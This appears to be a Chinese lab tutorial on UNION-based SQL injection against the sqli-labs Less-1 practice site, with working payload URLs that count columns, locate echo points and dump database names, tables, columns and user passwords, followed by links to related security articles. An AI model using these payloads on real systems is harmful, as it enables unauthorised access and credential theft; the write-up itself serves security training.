sql注入方式之联合注入

1.1 靶场环境

系统centos7 IP地址192.168.1.24

1.2 联合注入原理

联合查询注入是联合两个表进行注入攻击,使用关键词 union select 对两个表进行联合查询。两个表的字段要数要相同,不然会出现报错。

1.3 找注入点

找注入点,当输入id=1 and 1=2时没有变化,尝试单引号闭合找到注入类型

字符型注入,单引号闭合

1.4 判断字段数

使用order by 爆破字段数

复制代码
http://192.168.1.24/sqli-labs/Less-1/?id=-1' order by 3--+ 没有报错
http://192.168.1.24/sqli-labs/Less-1/?id=-1' order by 4--+ 报错

字段数为4

1.5 找回显点

复制代码
http://192.168.1.24/sqli-labs/Less-1/?id=-1' union select 1,2,3,4--+

爆出回显点2,3

1.6 爆数据库与数据库版本信息

开始信息收集(注意union前后格式要相同)

复制代码
?id=-1' union select 1,database(),version()--+
database():当前数据库名
version():数据库版本
user():数据库用户,用于判断是否有最高权限

爆数据库名以及数据库版本

1.7 爆数据表

复制代码
爆破表名
?id=-1' union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()--+

得到emails,referers,uagents,users数据表

1.8 爆users表中字段名

复制代码
?id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_name='users'--+

得到这些字段名user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password

1.9 爆用户名及密码

复制代码
爆破字段内容
?id=-1' union select 1,2,(select group_concat(username,password)from users)--+

在 sql 注入时加入换行符

我们可以在每一个用户名:密码后面添加一个换行符。

HTML 中换行符用来表示,但是我们需要转换成十六进制 0x3C,0x68,0x72,0x2F,0x3E

ASCII 码表:ASCII_百度百科

将十六进制的换行符添加到 password 字段后,注:password 后面必须添加一个逗号

复制代码
http://192.168.1.24/sqli-labs/Less-1/?id=-1' union select 1,group_concat(username,0x3a,password,0x3C,0x68,0x72,0x2F,0x3E),3 from users--+

可以看到每一行都是一个用户名:密码

相关推荐
Sagittarius_A*4 小时前
CSRF 跨站请求伪造:伪造请求攻击、绕过手段与底层防御
安全·web安全·csrf·dvwa
祁白_7 小时前
sqlmap工具
web安全·网络安全·sql注入·sqlmap
艺杯羹7 小时前
网络安全攻防演进:从单人砸门到AI博弈的五次战争
人工智能·安全·web安全·ddos·ip·ip欺骗
HackTwoHub8 小时前
等级保护现场测评系统重磅更新,支持 AI 接入,可录入全品类资产清单,自动化巡检核查,批量导出测评归档文件
运维·人工智能·安全·web安全·网络安全·自动化·系统安全
川石课堂软件测试8 小时前
安全测试|服务器安全加固方法
服务器·功能测试·测试工具·jmeter·mysql·web安全·单元测试
Sagittarius_A*9 小时前
Command Injection 命令注入漏洞:系统命令拼接缺陷与执行利用技术
网络·安全·web安全·dvwa·命令注入漏洞
Android洋芋10 小时前
漏洞挖掘与赏金攻略
网络·安全·web安全
Sagittarius_A*11 小时前
Open HTTP Redirect 开放重定向漏洞:URL 跳转校验缺陷与绕过技术
网络·安全·web安全·http·dvwa·burp suite
鹿鸣天涯1 天前
kali 2026.2 2026年第二个版本发布-新增 9 款工具并优化虚拟机启动性能
安全·web安全·kali
无忧智库1 天前
中大型企业整体网络安全解决方案:从“边界防火墙”到安全运营闭环(PPT)
安全·web安全